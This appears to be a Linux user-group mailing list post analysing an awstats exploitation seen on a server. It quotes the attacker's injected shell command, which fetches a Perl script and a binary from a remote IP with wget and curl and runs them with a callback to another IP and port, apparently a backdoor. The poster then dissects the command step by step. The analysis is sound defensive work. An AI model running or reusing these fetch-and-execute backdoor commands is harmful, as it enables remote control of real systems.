Obviously if awstats is properly configured/patched then it will not run this process
6087 ? R 81:06 sh -c echo ;echo b_exp;wget http://219.84.105.36/ping .txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget http://219.84.10 5.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping http://219.84.105 .36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o temp2006 http: //219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 220.227.100.4 3303;done;wg et http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o pin g http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;echo e_exp;% 00/awstats.w.x.y.z.conf and using a bit of common sense, you'll know that it had put in something on your box which is particularly malicious. Let's try to trim this down (since i have lots of time on my hands) - smells like a spawned sh shell. wget http://219.84.105.36/ping.txt mv ping.txt temp2006 perl temp2006 220.227.100.4 3303 : (smells like a backdoor) (oops this was unsuccessful, kiddie tries again using curl) cd /tmp/ curl -o temp2006 http://219.84.105.36/ping.txt perl temp2006 220.227.100.4 3303;done;wg (oops! this was unsuccessful too! 3 is a charm! this time comes precompiled *Grin*) wget http://219.84.105.36/ping chmod +x ping; ./ping 220.227.100.4 3303 and so on and so forth.. ;) ;) _________________________________________________ Philippine Linux Users' Group (PLUG) Mailing List [email protected] (#PLUG @ irc.free.net.ph) Read the Guidelines: http://linux.org.ph/lists Searchable Archives: http://archives.free.net.ph
